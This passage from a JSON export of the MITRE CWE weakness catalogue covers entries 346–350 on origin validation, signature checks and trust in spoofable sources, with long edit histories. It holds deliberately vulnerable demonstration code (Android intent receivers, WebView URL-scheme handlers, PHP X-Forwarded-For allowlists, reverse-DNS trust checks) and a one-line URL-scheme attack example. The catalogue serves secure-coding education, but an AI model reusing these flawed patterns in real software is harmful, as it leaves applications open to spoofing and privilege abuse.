category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Verification of Data","attr":{"@_Date":"2008-04-11"}}}},"346":{"attr":{"@_ID":"346","@_Name":"Origin Validation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that the source of data or communication is valid.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"},{"Reference":"CVE-2005-2188","Description":"user ID obtained from untrusted source (URL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2188"},{"Reference":"CVE-2003-0174","Description":"LDAP service does not verify if a particular attribute was set by the LDAP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0174"},{"Reference":"CVE-1999-1549","Description":"product does not sufficiently distinguish external HTML from internal, potentially dangerous HTML, allowing bypass using special strings in the page title. Overlaps special elements.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1549"},{"Reference":"CVE-2003-0981","Description":"product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Origin Validation Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"160"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"510"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":[{"#text":"This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes.","attr":{"@_Type":"Maintenance"}},{"#text":"The \\"Origin Validation Error\\" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) \\"an object [accepts] input from an unauthorized subject,\\" or (2) \\"the system [fails] to properly or completely authenticate a subject.\\" A later section says that an origin validation error can occur when the system (1) \\"does not properly authenticate a user or process\\" or (2) \\"does not properly authenticate the shared data or libraries.\\" The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Maintenance_Notes, References, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Terminology_Notes"}]}},"347":{"attr":{"@_ID":"347","@_Name":"Improper Verification of Cryptographic Signature","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not verify, or incorrectly verifies, the cryptographic signature for data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain access to sensitive data and possibly execute unauthorized code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code, a JarFile object is created from a downloaded file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"File f = new File(downloadedFilePath);JarFile jf = new JarFile(f);","xhtml:br":""}},"Body_Text":"The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1796","Description":"Does not properly verify signatures for \\"trusted\\" entities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1796"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2002-1706","Description":"Accepts a configuration file without a Message Integrity Check (MIC) signature.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1706"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Verified Signature"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"475"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improperly Verified Signature","attr":{"@_Date":"2009-05-27"}}}},"348":{"attr":{"@_ID":"348","@_Name":"Use of Less Trusted Source","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could utilize the untrusted data source to bypass protection mechanisms and gain access to sensitive data."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to limit the access of a page to certain IP Addresses. It checks the \'HTTP_X_FORWARDED_FOR\' header in case an authorized user is sending the request through a proxy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}if(in_array($requestingIP,$ipAllowlist)){}else{}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$requestingIP = $_SERVER[\'HTTP_X_FORWARDED_FOR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \\"You are not authorized to view this page\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"echo \\"This application cannot be accessed through a proxy.\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"..."}}],"Body_Text":["The \'HTTP_X_FORWARDED_FOR\' header can be user controlled and so should never be trusted. An attacker can falsify the header to gain access to the page.","This fixed code only trusts the \'REMOTE_ADDR\' header and so avoids the issue:","Be aware that \'REMOTE_ADDR\' can still be spoofed. This may seem useless because the server will send the response to the fake address and not the attacker, but this may still be enough to conduct an attack. For example, if the generatePage() function in this code is resource intensive, an attacker could flood the server with fake requests using an authorized IP and consume significant resources. This could be a serious DoS attack even though the attacker would never see the page\'s sensitive content."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0860","Description":"Product uses IP address provided by a client, instead of obtaining it from the packet headers, allowing easier spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0860"},{"Reference":"CVE-2004-1950","Description":"Web product uses the IP address in the X-Forwarded-For HTTP header instead of a server variable that uses the connecting IP address, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1950"},{"Reference":"BID:15326","Description":"Similar to CVE-2004-1950","Link":"http://www.securityfocus.com/bid/15326/info"},{"Reference":"CVE-2001-0908","Description":"Product logs IP address specified by the client instead of obtaining it from the packet headers, allowing information hiding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0908"},{"Reference":"CVE-2006-1126","Description":"PHP application uses IP address from X-Forwarded-For HTTP header, instead of REMOTE_ADDR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1126"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Use of Less Trusted Source"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"349":{"attr":{"@_ID":"349","@_Name":"Acceptance of Extraneous Untrusted Data With Trusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Modify Application Data"],"Note":"An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0018","Description":"Does not verify that trusted entity is authoritative for all entities in its response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0018"},{"Reference":"CVE-2006-5462","Description":"use of extra data in a signature allows certificate signature forging","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Data Appended with Trusted Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV01-J","Entry_Name":"Place all security-sensitive code in a single JAR and sign and seal it"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Untrusted Data Appended with Trusted Data","attr":{"@_Date":"2008-04-11"}}}},"350":{"attr":{"@_ID":"350","@_Name":"Reliance on Reverse DNS Resolution for a Security-Critical Action","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.","Extended_Description":{"xhtml:p":["Since DNS names can be easily spoofed or misreported, and it may be difficult for the software to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism.","When the software performs a reverse DNS resolution for an IP address, if an attacker controls the server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks.","Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"923","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Malicious users can fake authentication information by providing false DNS information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."},{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = 